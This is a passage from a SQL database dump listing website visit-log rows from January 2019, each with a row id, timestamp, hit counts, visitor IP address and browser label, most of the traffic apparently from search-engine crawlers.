er'),(366520,1546868144,1,1,0,0,'54.36.149.81','other'),(366521,1546868479,1,1,0,0,'54.36.148.136','other'),(366522,1546868527,1,1,0,0,'37.9.113.148','other'),(366523,1546868662,1,1,0,0,'207.46.13.87','other'),(366524,1546868816,1,1,0,0,'46.211.109.99','chrome'),(366525,1546868865,3,3,0,0,'216.244.66.241','other'),(366526,1546868984,1,1,0,0,'54.36.149.3','other'),(366527,1546869277,1,1,0,0,'54.36.149.77','other'),(366528,1546869490,1,1,0,0,'40.77.167.125','other'),(366529,1546869690,1,1,0,0,'95.163.255.109','other'),(366530,1546870023,1,1,0,0,'95.163.255.115','other'),(366531,1546870165,1,1,0,0,'54.36.149.92','other'),(366532,1546870377,1,1,0,0,'54.36.149.83','other'),(366533,1546870387,1,1,0,0,'54.36.148.250','other'),(366534,1546870469,1,1,0,0,'54.36.148.120','other'),(366535,1546870679,9,9,0,0,'216.244.66.241','other'),(366536,1546870976,1,1,0,0,'66.249.66.42','chrome'),(366537,1546871006,1,1,0,0,'141.8.142.103','other'),(366538,1546871129,1,1,0,0,'54.36.149.90','other'),(366539,1546871453,1,1,0,0,'95.163.255.99','other'),(366540,1546871455,1,1,0,0,'95.163.255.95','other'),(366541,1546872385,1,1,0,0,'66.249.66.152','chrome'),(366542,1546872638,1,1,0,0,'176.98.25.21','chrome'),(366543,1546872687,2,2,0,0,'37.73.88.115','chrome'),(366544,1546873241,1,1,0,0,'66.249.66.57','chrome'),(366545,1546873242,1,1,0,0,'66.249.66.40','chrome'),(366546,1546873270,1,1,0,0,'66.249.66.156','chrome'),(366547,1546873281,1,1,0,0,'66.249.66.154','chrome'),(366548,1546873511,5,5,0,0,'216.244.66.241','other'),(366549,1546873535,1,1,0,0,'54.36.148.95','other'),(366550,1546873737,1,1,0,0,'157.55.39.141','other'),(366551,1546873874,1,1,0,0,'207.46.13.58','other'),(366552,1546874545,1,1,0,0,'92.112.125.48','chrome'),(366553,1546875107,1,1,0,0,'87.250.224.65','other'),(366554,1546875178,1,1,0,0,'46.229.168.144','other'),(366555,1546875267,1,1,0,0,'66.249.66.152','chrome'),(366556,1546875302,3,3,0,0,'157.55.39.141','other'),(366557,1546875372,1,1,0,0,'37.9.113.148','other'),(366558,1546875426,1,1,0,0,'8.29.198.26','other'),(366559,1546875477,16,16,0,0,'207.46.13.87','other'),(366560,1546875493,16,16,0,0,'207.46.13.58','other'),(366561,1546875603,1,1,0,0,'54.36.149.106','other'),(366562,1546875703,1,1,0,0,'54.36.148.84','other'),(366563,1546876027,3,3,0,0,'141.8.142.103','other'),(366564,1546876244,11,11,0,0,'40.77.167.125','other'),(366565,1546876252,1,1,0,0,'46.229.168.136','other'),(366566,1546876323,1,1,0,0,'87.250.224.47','other'),(366567,1546876368,11,11,0,0,'216.244.66.241','other'),(366568,1546876434,3,3,0,0,'5.45.207.79','other'),(366569,1546876563,1,1,0,0,'185.57.28.203','other'),(366570,1546876688,1,1,0,0,'8.29.198.25','other'),(366571,1546877114,2,2,0,0,'95.108.213.4','other'),(366572,1546877333,1,1,0,0,'216.244.66.241','other'),(366573,1546877371,11,11,0,0,'40.77.167.125','other'),(366574,1546877457,3,3,0,0,'5.45.207.19','other'),(366575,1546877521,3,3,0,0,'5.45.207.79','other'),(366576,1546877543,5,5,0,0,'178.154.244.11','other'),(366577,1546877778,3,3,0,0,'141.8.142.103','other'),(366578,1546877869,3,3,0,0,'87.250.224.47','other'),(366579,1546878031,1,1,0,0,'95.108.213.4','other'),(366580,1546878232,1,1,0,0,'66.249.66.44','chrome'),(366581,1546878274,1,1,0,0,'54.36.148.223','other'),(366582,1546879101,1,1,0,0,'66.249.66.157','chrome'),(366583,1546879102,1,1,0,0,'66.249.66.156','chrome'),(366584,1546879104,1,1,0,0,'141.8.142.103','other'),(366585,1546879110,1,1,0,0,'95.163.255.150','other'),(366586,1546879113,1,1,0,0,'95.163.255.154','other'),(366587,1546879185,5,5,0,0,'216.244.66.241','other'),(366588,1546879315,2,2,0,0,'178.154.244.11','other'),(366589,1546879427,1,1,0,0,'46.229.168.144','other'),(366590,1546879913,1,1,0,0,'46.229.168.148','other'),(366591,1546880095,1,1,0,0,'216.244.66.241','other'),(366592,1546881355,1,1,0,0,'46.229.168.154','other'),(366593,1546881357,1,1,0,0,'46.229.168.151','other'),(366594,1546881772,1,1,0,0,'54.36.148.128','other'),(366595,1546882011,8,8,0,0,'216.244.66.241','other'),(366596,1546882212,1,1,0,0,'176.14.243.50','msie'),(366597,1546882476,1,1,0,0,'66.249.66.40','chrome'),(366598,1546882529,2,2,0,0,'5.45.207.19','other'),(366599,1546882693,1,1,0,0,'157.55.39.141','other'),(366600,1546882874,1,1,0,0,'37.9.113.148','other'),(366601,1546882911,1,1,0,0,'54.36.148.79','other'),(366602,1546882985,2,2,0,0,'207.46.13.46','other'),(366603,1546883097,1,1,0,0,'95.163.255.105','other'),(366604,1546883142,1,1,0,0,'95.163.255.109','other'),(366605,1546883286,1,1,0,0,'5.45.207.79','other'),(366606,1546883418,1,1,0,0,'95.163.255.92','other'),(366607,1546883422,1,1,0,0,'95.163.255.94','other'),(366608,1546883532,1,1,0,0,'178.154.244.11','other'),(366609,1546883666,1,1,0,0,'54.36.148.163','other'),(366610,1546883742,1,1,0,0,'95.90.194.210','other'),(366611,1546883810,1,1,0,0,'46.229.168.148','other'),(366612,1546883820,1,1,0,0,'95.163.255.103','other'),(366613,1546883945,1,1,0,0,'95.163.255.113','other'),(366614,1546884110,1,1,0,0,'95.163.255.102','other'),(366615,1546884206,1,1,0,0,'95.163.255.115','other'),(366616,1546884209,1,1,0,0,'54.36.149.82','other'),(366617,1546884238,1,1,0,0,'188.163.38.55','chrome'),(366618,1546884253,1,1,0,0,'95.163.255.116','other'),(366619,1546884295,1,1,0,0,'95.163.255.106','other'),(366620,1546884563,2,2,0,0,'157.55.39.141','other'),(366621,1546884834,8,8,0,0,'216.244.66.241','other'),(366622,1546885004,1,1,0,0,'54.36.148.92','other'),(366623,1546885163,1,1,0,0,'46.229.168.136','other'),(366624,1546885351,1,1,0,0,'66.249.66.44','chrome'),(366625,1546885759,2,2,0,0,'216.244.66.241','other'),(366626,1546886250,1,1,0,0,'8.29.198.26','other'),(366627,1546886643,1,1,0,0,'46.229.168.148','other'),(366628,1546886847,1,1,0,0,'157.55.39.230','other'),(366629,1546887076,2,2,0,0,'66.249.66.156','chrome'),(366630,1546887476,1,1,0,0,'141.8.142.103','other'),(366631,1546887523,1,1,0,0,'8.29.198.25','other'),(366632,1546887581,1,1,0,0,'66.249.66.155','chrome'),(366633,1546887595,1,1,0,0,'40.77.167.163','other'),(366634,1546887622,3,3,0,0,'216.244.66.241','other'),(366635,1546887651,1,1,0,0,'46.229.168.132','other'),(366636,1546887653,1,1,0,0,'46.229.168.152','other'),(366637,1546887826,1,1,0,0,'66.249.93.216','chrome'),(366638,1546887882,1,1,0,0,'95.108.213.4','other'),(366639,1546887903,1,1,0,0,'54.36.148.59','other'),(366640,1546887908,2,2,0,0,'5.45.207.79','other'),(366641,1546887962,1,1,0,0,'193.239.234.176','chrome'),(366642,1546888132,1,1,0,0,'54.36.149.89','other'),(366643,1546888230,1,1,0,0,'207.46.13.46','other'),(366644,1546888275,1,1,0,0,'54.36.148.186','other'),(366645,1546888472,1,1,0,0,'46.229.168.139','other'),(366646,1546888614,1,1,0,0,'66.249.66.40','chrome'),(366647,1546889415,3,3,0,0,'216.244.66.241','other'),(366648,1546889647,1,1,0,0,'46.229.168.134','other'),(366649,1546889706,1,1,0,0,'66.249.66.40','chrome'),(366650,1546890058,1,1,0,0,'207.46.13.58','other'),(366651,1546890268,1,1,0,0,'46.229.168.140','other'),(366652,1546890429,7,7,0,0,'216.244.66.241','other'),(366653,1546890552,4,4,0,0,'178.154.244.11','other'),(366654,1546891073,1,1,0,0,'5.45.207.19','other'),(366655,1546891425,1,1,0,0,'54.36.149.59','other'),(366656,1546891498,1,1,0,0,'54.36.148.183','other'),(366657,1546891620,2,2,0,0,'5.45.207.79','other'),(366658,1546891663,2,2,0,0,'216.244.66.241','other'),(366659,1546891669,1,1,0,0,'54.36.148.125','other'),(366660,1546891728,2,2,0,0,'178.154.244.11','other'),(366661,1546891730,2,2,0,0,'141.8.142.103','other'),(366662,1546891863,4,4,0,0,'207.46.13.64','other'),(366663,1546891871,2,2,0,0,'207.46.13.58','other'),(366664,1546892299,1,1,0,0,'5.45.207.19','other'),(366665,1546892414,1,1,0,0,'54.36.148.26','other'),(366666,1546892639,1,1,0,0,'212.92.254.193','chrome'),(366667,1546892806,1,1,0,0,'66.249.66.40','chrome'),(366668,1546893072,1,1,0,0,'54.36.148.163','other'),(366669,1546893254,7,7,0,0,'216.244.66.241','other'),(366670,1546894020,1,1,0,0,'66.102.9.40','chrome'),(366671,1546894021,1,1,0,0,'66.102.9.58','chrome'),(366672,1546894216,2,2,0,0,'216.244.66.241','other'),(366673,1546894280,1,1,0,0,'46.229.168.150','other'),(366674,1546894282,1,1,0,0,'46.229.168.142','other'),(366675,1546894484,7,7,0,0,'31.148.29.2','chrome'),(366676,1546894588,1,1,0,0,'66.249.66.156','chrome'),(366677,1546895171,1,1,0,0,'66.249.66.155','chrome'),(366678,1546895172,1,1,0,0,'66.249.66.152','chrome'),(366679,1546895448,1,1,0,0,'46.229.168.150','other'),(366680,1546895693,1,1,0,0,'54.36.148.156','other'),(366681,1546895764,1,1,0,0,'54.36.148.168','other'),(366682,1546896070,6,6,0,0,'216.244.66.241','other'),(366683,1546896179,1,1,0,0,'54.36.149.8','other'),(366684,1546896227,1,1,0,0,'54.36.149.63','other'),(366685,1546896734,1,1,0,0,'54.36.148.167','other'),(366686,1546896782,2,2,0,0,'91.209.11.236','other'),(366687,1546896897,1,1,0,0,'54.36.148.147','other'),(366688,1546897044,1,1,0,0,'46.229.168.139','other'),(366689,1546897076,1,1,0,0,'8.29.198.26','other'),(366690,1546897178,1,1,0,0,'54.36.148.17','other'),(366691,1546897296,2,2,0,0,'66.249.83.221','chrome'),(366693,1546897298,2,2,0,0,'66.249.83.218','chrome'),(366694,1546897827,3,3,0,0,'216.244.66.241','other'),(366695,1546897908,1,1,0,0,'46.229.168.152','other'),(366696,1546898192,1,1,0,0,'66.249.66.156','chrome'),(366697,1546898227,1,1,0,0,'46.229.168.135','other'),(366698,1546898320,1,1,0,0,'54.36.148.229','other'),(366699,1546898367,1,1,0,0,'8.29.198.27','other'),(366700,1546898686,1,1,0,0,'37.144.136.211','msie'),(366701,1546898708,1,1,0,0,'5.45.207.79','other'),(366702,1546898872,10,10,0,0,'216.244.66.241','other'),(366703,1546898949,1,1,0,0,'37.9.113.20','other'),(366704,1546900324,1,1,0,0,'157.55.39.66','other'),(366705,1546900424,1,1,0,0,'54.36.148.68','other'),(366706,1546900515,2,2,0,0,'95.163.255.99','other'),(366707,1546900521,1,1,0,0,'54.36.148.108','other'),(366708,1546900620,1,1,0,0,'66.249.66.157','chrome'),(366709,1546900621,1,1,0,0,'66.249.66.156','chrome'),(366710,1546900635,1,1,0,0,'46.229.168.154','other'),(366711,1546900756,1,1,0,0,'54.36.148.76','other'),(366712,1546900907,1,1,0,0,'92.110.183.97','chrome'),(366713,1546901253,1,1,0,0,'46.229.168.147','other'),(366714,1546901346,1,1,0,0,'46.229.168.144','other'),(366715,1546901675,6,6,0,0,'216.244.66.241','other'),(366716,1546901816,1,1,0,0,'54.36.148.136','other'),(366717,1546901888,1,1,0,0,'66.249.66.154','chrome'),(366718,1546901922,3,3,0,0,'5.9.70.72','other'),(366719,1546902441,1,1,0,0,'66.249.66.152','chrome'),(366720,1546902462,1,1,0,0,'54.36.149.47','other'),(366721,1546902656,1,1,0,0,'5.45.207.19','other'),(366722,1546902785,2,2,0,0,'216.244.66.241','other'),(366723,1546902875,1,1,0,0,'46.229.168.136','other'),(366724,1546902910,1,1,0,0,'46.229.168.135','other'),(366725,1546903000,1,1,0,0,'46.229.168.154','other'),(366726,1546903037,1,1,0,0,'66.249.66.156','chrome'),(366727,1546903660,2,2,0,0,'54.165.59.7','other'),(366728,1546903733,1,1,0,0,'54.36.148.244','other'),(366729,1546904442,6,6,0,0,'216.244.66.241','other'),(366730,1546904530,42,42,0,0,'46.4.67.206','other'),(366731,1546904531,1,1,0,0,'46.229.168.139','other'),(366732,1546904596,1,1,0,0,'54.165.59.7','other'),(366733,1546905384,4,4,0,0,'216.244.66.241','other'),(366734,1546905418,1,1,0,0,'40.77.167.153','other'),(366735,1546905507,1,1,0,0,'95.163.255.93','other'),(366736,1546905510,1,1,0,0,'95.163.255.92','other'),(366737,1546905631,3,3,0,0,'95.163.255.99','other'),(366738,1546905890,34,34,0,0,'46.4.67.206','other'),(366739,1546905950,1,1,0,0,'95.163.255.98','other'),(366740,1546906611,2,2,0,0,'95.108.213.4','other'),(366741,1546906921,1,1,0,0,'54.36.148.218','other'),(366742,1546907025,1,1,0,0,'37.9.113.20','other'),(366743,1546907226,4,4,0,0,'216.244.66.241','other'),(366744,1546907495,1,1,0,0,'46.229.168.138','other'),(366745,1546907872,1,1,0,0,'66.249.66.156','chrome'),(366746,1546907900,1,1,0,0,'8.29.198.27','other'),(366747,1546907940,1,1,0,0,'54.36.148.82','other'),(366748,1546908258,1,1,0,0,'178.154.244.11','other'),(366749,1546908387,1,1,0,0,'66.249.66.42','chrome'),(366750,1546908900,1,1,0,0,'66.249.66.155','chrome'),(366751,1546908901,1,1,0,0,'66.249.66.152','chrome'),(366752,1546908931,1,1,0,0,'188.165.61.244','other'),(366753,1546909204,1,1,0,0,'8.29.198.26','other'),(366754,1546909412,1,1,0,0,'54.36.148.219','other'),(366755,1546909485,1,1,0,0,'46.229.168.154','other'),(366756,1546909486,1,1,0,0,'46.229.168.143','other'),(366757,1546909861,2,2,0,0,'91.209.11.236','other'),(366758,1546909969,2,2,0,0,'46.229.168.139','other'),(366759,1546910012,5,5,0,0,'216.244.66.241','other'),(366760,1546910143,1,1,0,0,'54.36.148.88','other'),(366761,1546910229,1,1,0,0,'54.36.148.94','other'),(366762,1546910278,1,1,0,0,'54.36.148.101','other'),(366763,1546910279,1,1,0,0,'66.249.66.154','chrome'),(366764,1546910656,1,1,0,0,'88.99.2.203','other'),(366765,1546910662,1,1,0,0,'54.36.148.251','other'),(366766,1546910677,1,1,0,0,'46.229.168.153','other'),(366767,1546911344,1,1,0,0,'66.249.66.154','chrome'),(366768,1546912130,1,1,0,0,'46.229.168.137','other'),(366769,1546912809,11,11,0,0,'216.244.66.241','other'),(366770,1546912838,1,1,0,0,'207.46.13.100','other'),(366771,1546913353,2,2,0,0,'66.249.66.156','chrome'),(366772,1546913652,1,1,0,0,'89.178.225.19','msie'),(366773,1546914057,2,2,0,0,'46.229.168.154','other'),(366774,1546915538,3,3,0,0,'216.244.66.241','other'),(366775,1546916156,1,1,0,0,'46.229.168.150','other'),(366776,1546916158,1,1,0,0,'46.229.168.130','other'),(366777,1546917856,1,1,0,0,'88.99.2.203','other'),(366778,1546918318,8,8,0,0,'216.244.66.241','other'),(366779,1546918548,1,1,0,0,'66.249.66.157','chrome'),(366780,1546918723,1,1,0,0,'8.29.198.27','other'),(366781,1546919370,1,1,0,0,'66.249.66.154','chrome'),(366782,1546920045,1,1,0,0,'8.29.198.25','other'),(366783,1546920330,1,1,0,0,'46.229.168.137','other'),(366784,1546920689,1,1,0,0,'66.249.66.156','chrome'),(366785,1546920933,1,1,0,0,'66.249.66.44','chrome'),(366786,1546921107,8,8,0,0,'216.244.66.241','other'),(366787,1546921485,1,1,0,0,'46.229.168.138','other'),(366788,1546921497,1,1,0,0,'54.36.149.88','other'),(366789,1546921885,114,114,0,0,'34.192.116.178','chrome'),(366790,1546921895,1,1,0,0,'34.192.116.178','other'),(366791,1546922240,1,1,0,0,'157.55.39.146','other'),(366792,1546922300,1,1,0,0,'54.36.148.155','other'),(366793,1546922544,1,1,0,0,'66.249.66.61','chrome'),(366795,1546922885,2,2,0,0,'62.201.232.89','chrome'),(366796,1546923273,1,1,0,0,'54.36.148.252','other'),(366797,1546923563,1,1,0,0,'5.45.207.79','other'),(366798,1546923830,7,7,0,0,'216.244.66.241','other'),(366799,1546923859,1,1,0,0,'95.163.255.69','other'),(366800,1546923863,1,1,0,0,'95.163.255.67','other'),(366801,1546923885,1,1,0,0,'178.154.171.27','other'),(366802,1546924102,1,1,0,0,'40.77.167.101','other'),(366803,1546924107,1,1,0,0,'5.255.253.38','other'),(366804,1546924111,1,1,0,0,'37.9.113.20','other'),(366805,1546924182,1,1,0,0,'95.108.181.54','other'),(366806,1546924768,1,1,0,0,'157.55.39.146','other'),(366807,1546924875,1,1,0,0,'54.36.148.254','other'),(366808,1546924967,1,1,0,0,'216.244.66.241','other'),(366809,1546925102,1,1,0,0,'54.36.148.113','other'),(366810,1546925464,1,1,0,0,'46.229.168.129','other'),(366811,1546926394,1,1,0,0,'66.249.66.155','chrome'),(366813,1546926609,15,15,0,0,'216.244.66.241','other'),(366814,1546926733,1,1,0,0,'66.249.66.156','chrome'),(366815,1546927073,1,1,0,0,'46.229.168.147','other'),(366816,1546927319,1,1,0,0,'54.36.148.197','other'),(366817,1546927420,1,1,0,0,'46.229.168.140','other'),(366818,1546927535,2,2,0,0,'176.31.208.193','other'),(366819,1546927635,2,2,0,0,'91.196.178.67','chrome'),(366820,1546927702,1,1,0,0,'216.244.66.241','other'),(366821,1546928060,1,1,0,0,'54.36.148.168','other'),(366822,1546928132,2,2,0,0,'34.222.140.140','chrome'),(366823,1546928479,1,1,0,0,'46.229.168.136','other'),(366824,1546928731,3,3,0,0,'207.46.13.207','other'),(366825,1546928741,1,1,0,0,'54.36.148.217','other'),(366826,1546928819,2,2,0,0,'60.191.38.77','firefox'),(366827,1546928970,1,1,0,0,'54.36.149.64','other'),(366828,1546928992,2,2,0,0,'91.196.177.46','firefox'),(366829,1546929001,1,1,0,0,'157.55.39.82','other'),(366830,1546929364,1,1,0,0,'54.36.148.198','other'),(366831,1546929396,6,6,0,0,'216.244.66.241','other'),(366832,1546929441,1,1,0,0,'66.249.66.61','chrome'),(366833,1546929442,1,1,0,0,'66.249.66.40','chrome'),(366834,1546929514,1,1,0,0,'157.55.39.146','other'),(366835,1546929550,1,1,0,0,'8.29.198.27','other'),(366836,1546929636,1,1,0,0,'157.55.39.132','other'),(366837,1546929653,1,1,0,0,'54.36.148.20','other'),(366838,1546929926,1,1,0,0,'66.249.66.156','chrome'),(366839,1546929994,1,1,0,0,'207.46.13.183','other'),(366840,1546930032,1,1,0,0,'207.46.13.69','other'),(366841,1546930227,2,2,0,0,'91.196.178.73','chrome'),(366842,1546930333,1,1,0,0,'54.36.149.65','other'),(366843,1546930389,1,1,0,0,'54.36.148.245','other'),(366844,1546930548,2,2,0,0,'66.249.66.154','chrome'),(366845,1546930575,1,1,0,0,'66.249.66.42','chrome'),(366846,1546930662,2,2,0,0,'91.196.178.70','chrome'),(366847,1546930880,1,1,0,0,'8.29.198.25','other'),(366848,1546930945,1,1,0,0,'66.249.66.152','chrome'),(366849,1546931175,1,1,0,0,'207.46.13.207','other'),(366850,1546931475,1,1,0,0,'46.229.168.145','other'),(366851,1546931504,1,1,0,0,'213.180.203.9','other'),(366852,1546931508,1,1,0,0,'178.154.171.24','other'),(366853,1546931699,1,1,0,0,'37.9.113.20','other'),(366854,1546931703,1,1,0,0,'95.108.181.54','other'),(366855,1546931867,1,1,0,0,'37.9.113.103','other'),(366856,1546932165,3,3,0,0,'66.249.66.152','chrome'),(366857,1546932168,10,10,0,0,'216.244.66.241','other'),(366858,1546932431,1,1,0,0,'62.205.134.182','msie'),(366859,1546932432,1,1,0,0,'66.249.66.155','chrome'),(366861,1546932730,1,1,0,0,'31.184.238.107','chrome'),(366862,1546932768,1,1,0,0,'66.249.66.156','chrome'),(366863,1546933059,1,1,0,0,'54.36.148.96','other'),(366864,1546933086,2,2,0,0,'207.46.13.207','other'),(366865,1546933620,1,1,0,0,'216.244.66.241','other'),(366866,1546933727,1,1,0,0,'54.36.148.196','other'),(366867,1546933893,1,1,0,0,'46.229.168.140','other'),(366868,1546933993,1,1,0,0,'54.36.148.22','other'),(366869,1546934139,1,1,0,0,'157.55.39.132','other'),(366870,1546934472,1,1,0,0,'46.229.168.154','other'),(366871,1546934660,4,4,0,0,'66.249.66.156','chrome'),(366872,1546934901,1,1,0,0,'54.36.149.43','other'),(366873,1546934948,3,3,0,0,'216.244.66.241','other'),(366874,1546935096,1,1,0,0,'54.36.149.1','other'),(366875,1546935121,1,1,0,0,'54.36.148.230','other'),(366876,1546935297,1,1,0,0,'157.55.39.146','other'),(366877,1546935490,1,1,0,0,'54.36.148.62','other'),(366878,1546935499,1,1,0,0,'66.249.66.152','chrome'),(366879,1546935597,1,1,0,0,'54.36.148.63','other'),(366880,1546935620,1,1,0,0,'46.229.168.148','other'),(366881,1546935935,3,3,0,0,'216.244.66.241','other'),(366882,1546936015,1,1,0,0,'54.36.148.211','other'),(366883,1546936314,1,1,0,0,'66.249.66.40','chrome'),(366884,1546936346,1,1,0,0,'66.249.66.154','chrome'),(366885,1546936442,1,1,0,0,'66.249.66.156','chrome'),(366887,1546936752,1,1,0,0,'54.36.149.48','other'),(366888,1546936808,1,1,0,0,'207.46.13.201','other'),(366889,1546936964,1,1,0,0,'66.249.66.44','chrome'),(366890,1546936980,1,1,0,0,'54.36.148.197','other'),(366891,1546937141,1,1,0,0,'66.249.66.152','chrome'),(366892,1546937309,1,1,0,0,'157.55.39.146','other'),(366893,1546937350,1,1,0,0,'54.36.149.101','other'),(366894,1546937406,1,1,0,0,'46.229.168.139','other'),(366895,1546937543,3,3,0,0,'66.249.66.154','chrome'),(366896,1546937579,1,1,0,0,'54.36.148.125','other'),(366897,1546937721,10,10,0,0,'216.244.66.241','other'),(366898,1546937752,2,2,0,0,'31.43.31.110','chrome'),(366899,1546937836,4,4,0,0,'66.249.66.156','chrome'),(366900,1546938293,1,1,0,0,'66.249.93.204','chrome'),(366902,1546938351,2,2,0,0,'5.45.207.19','other'),(366903,1546938573,1,1,0,0,'46.229.168.139','other'),(366904,1546938574,1,1,0,0,'46.229.168.140','other'),(366905,1546938679,1,1,0,0,'37.53.123.48','chrome'),(366906,1546938706,2,2,0,0,'66.249.66.154','chrome'),(366907,1546938813,1,1,0,0,'66.249.66.59','chrome'),(366909,1546938931,1,1,0,0,'66.249.66.155','chrome'),(366911,1546938985,2,2,0,0,'46.229.168.148','other'),(366912,1546939194,2,2,0,0,'66.249.66.152','chrome'),(366913,1546939327,1,1,0,0,'180.76.15.26','other'),(366914,1546939389,1,1,0,0,'216.244.66.241','other'),(366915,1546939675,1,1,0,0,'66.249.64.42','chrome'),(366916,1546940221,1,1,0,0,'66.249.66.156','chrome'),(366917,1546940379,1,1,0,0,'8.29.198.27','other'),(366918,1546940522,12,12,0,0,'216.244.66.241','other'),(366919,1546940744,1,1,0,0,'66.249.66.154','chrome'),(366920,1546940757,1,1,0,0,'66.249.66.152','chrome'),(366921,1546940912,3,3,0,0,'91.196.178.86','chrome'),(366922,1546941249,3,3,0,0,'66.249.66.156','chrome'),(366923,1546941436,2,2,0,0,'216.244.66.241','other'),(366924,1546941722,1,1,0,0,'8.29.198.27','other'),(366925,1546941850,1,1,0,0,'54.36.149.65','other'),(366926,1546942158,1,1,0,0,'46.229.168.154','other'),(366927,1546942160,1,1,0,0,'46.229.168.144','other'),(366928,1546942246,1,1,0,0,'46.229.168.136','other'),(366929,1546942431,4,4,0,0,'216.244.66.241','other'),(366930,1546942458,1,1,0,0,'54.36.148.52','other'),(366931,1546942661,2,2,0,0,'66.249.66.155','chrome'),(366932,1546942662,1,1,0,0,'66.249.66.152','chrome'),(366933,1546942673,2,2,0,0,'66.249.66.44','chrome'),(366934,1546942697,1,1,0,0,'66.249.66.156','chrome'),(366935,1546943010,1,1,0,0,'66.249.66.42','chrome'),(366936,1546943131,1,1,0,0,'66.249.66.157','chrome'),(366937,1546943132,1,1,0,0,'66.249.66.154','chrome'),(366938,1546943327,1,1,0,0,'180.76.15.135','other'),(366939,1546943328,1,1,0,0,'180.76.15.32','other'),(366940,1546943402,1,1,0,0,'91.196.178.90','firefox'),(366941,1546943494,4,4,0,0,'216.244.66.241','other'),(366942,1546943735,1,1,0,0,'157.55.39.146','other'),(366943,1546943804,1,1,0,0,'54.36.148.38','other'),(366944,1546943808,1,1,0,0,'54.36.148.28','other'),(366945,1546943953,1,1,0,0,'54.36.148.180','other'),(366946,1546943957,1,1,0,0,'62.205.134.182','msie'),(366947,1546944013,2,2,0,0,'66.249.66.44','chrome'),(366948,1546944016,2,2,0,0,'31.134.125.12','chrome'),(366949,1546944019,1,1,0,0,'54.36.148.114','other'),(366950,1546944138,2,2,0,0,'91.196.178.173','chrome'),(366951,1546944395,1,1,0,0,'54.36.148.14','other'),(366952,1546944673,1,1,0,0,'66.249.66.154','chrome'),(366953,1546944705,1,1,0,0,'95.163.255.176','other'),(366954,1546944709,1,1,0,0,'95.163.255.181','other'),(366955,1546944903,1,1,0,0,'91.196.178.90','firefox'),(366956,1546945029,1,1,0,0,'54.36.149.27','other'),(366957,1546945399,1,1,0,0,'46.229.168.134','other'),(366958,1546945747,1,1,0,0,'46.229.168.147','other'),(366959,1546945768,2,2,0,0,'66.249.66.156','chrome'),(366960,1546946011,1,1,0,0,'54.36.148.90','other'),(366961,1546946031,1,1,0,0,'157.55.39.132','other'),(366962,1546946068,12,12,0,0,'216.244.66.241','other'),(366963,1546946685,1,1,0,0,'46.229.168.135','other'),(366964,1546946755,2,2,0,0,'66.249.66.154','chrome'),(366965,1546946888,1,1,0,0,'54.36.148.24','other'),(366966,1546946987,1,1,0,0,'66.249.66.156','chrome'),(366967,1546946989,1,1,0,0,'37.9.113.148','other'),(366968,1546947193,1,1,0,0,'46.229.168.133','other'),(366969,1546947510,1,1,0,0,'87.250.224.47','other'),(366970,1546947730,1,1,0,0,'216.244.66.241','other'),(366971,1546947731,1,1,0,0,'5.45.207.19','other'),(366972,1546947812,3,3,0,0,'66.249.66.154','chrome'),(366973,1546947923,2,2,0,0,'212.90.167.162','firefox'),(366974,1546947943,1,1,0,0,'13.66.139.0','other'),(366975,1546948073,1,1,0,0,'46.229.168.139','other'),(366976,1546948311,1,1,0,0,'66.249.66.61','chrome'),(366978,1546948322,2,2,0,0,'66.249.66.155','chrome'),(366980,1546948684,1,1,0,0,'66.249.66.157','chrome'),(366981,1546948742,2,2,0,0,'66.249.66.152','chrome'),(366982,1546948779,1,1,0,0,'54.36.148.255','other'),(366983,1546948850,9,9,0,0,'216.244.66.241','other'),(366984,1546949324,4,4,0,0,'157.55.39.132','other'),(366985,1546949355,1,1,0,0,'66.249.66.155','chrome'),(366986,1546949360,3,3,0,0,'66.249.66.154','chrome'),(366987,1546949412,2,2,0,0,'66.249.66.156','chrome'),(366988,1546949438,1,1,0,0,'54.36.148.236','other'),(366989,1546950032,2,2,0,0,'66.249.66.152','chrome'),(366990,1546950204,1,1,0,0,'66.249.66.40','chrome'),(366991,1546950246,1,1,0,0,'216.244.66.241','other'),(366992,1546950371,2,2,0,0,'91.196.178.67','chrome'),(366993,1546950446,2,2,0,0,'37.54.19.126','chrome'),(366994,1546950557,2,2,0,0,'66.249.66.156','chrome'),(366995,1546950745,1,1,0,0,'54.36.148.234','other'),(366996,1546951011,1,1,0,0,'92.112.125.48','chrome'),(366997,1546951205,2,2,0,0,'77.222.134.102','chrome'),(366998,1546951211,1,1,0,0,'8.29.198.27','other'),(366999,1546951703,2,2,0,0,'216.244.66.241','other'),(367000,1546951747,1,1,0,0,'54.36.148.244','other'),(367001,1546951891,1,1,0,0,'66.249.66.157','chrome'),(367002,1546951892,1,1,0,0,'66.249.66.154','chrome'),(367003,1546951999,1,1,0,0,'54.36.149.73','other'),(367004,1546952308,1,1,0,0,'46.229.168.146','other'),(367005,1546952350,1,1,0,0,'66.249.66.152','chrome'),(367006,1546952542,1,1,0,0,'157.55.39.124','other'),(367007,1546952559,1,1,0,0,'8.29.198.27','other'),(367008,1546952845,1,1,0,0,'66.249.66.57','chrome'),(367009,1546953016,1,1,0,0,'66.249.66.154','chrome'),(367010,1546953170,2,2,0,0,'216.244.66.241','other'),(367011,1546953177,3,3,0,0,'91.196.178.47','chrome'),(367012,1546953215,4,4,0,0,'159.253.145.183','firefox'),(367013,1546953339,1,1,0,0,'46.229.168.153','other'),(367014,1546953652,1,1,0,0,'54.36.149.92','other'),(367015,1546953812,1,1,0,0,'54.36.148.184','other'),(367016,1546953848,1,1,0,0,'66.249.66.157','chrome'),(367017,1546953849,1,1,0,0,'66.249.66.156','chrome'),(367018,1546953944,3,3,0,0,'66.249.66.154','chrome'),(367019,1546953969,1,1,0,0,'66.249.66.152','chrome'),(367020,1546954123,1,1,0,0,'95.134.221.148','chrome'),(367021,1546954200,1,1,0,0,'5.45.207.19','other'),(367022,1546954350,1,1,0,0,'91.196.178.163','firefox'),(367023,1546954473,5,5,0,0,'216.244.66.241','other'),(367024,1546954956,1,1,0,0,'87.250.224.47','other'),(367025,1546954997,1,1,0,0,'66.249.66.152','chrome'),(367026,1546955257,1,1,0,0,'54.36.149.90','other'),(367027,1546955553,1,1,0,0,'66.249.66.44','chrome'),(367028,1546955647,1,1,0,0,'216.244.66.241','other'),(367029,1546955671,1,1,0,0,'37.9.113.20','other'),(367030,1546955740,1,1,0,0,'157.55.39.59','other'),(367031,1546956030,1,1,0,0,'157.55.39.124','other'),(367032,1546956106,1,1,0,0,'54.36.149.68','other'),(367033,1546956426,1,1,0,0,'157.55.39.146','other'),(367034,1546956516,3,3,0,0,'85.115.62.180','chrome'),(367035,1546956573,4,4,0,0,'66.249.66.154','chrome'),(367036,1546956597,3,3,0,0,'66.249.66.152','chrome'),(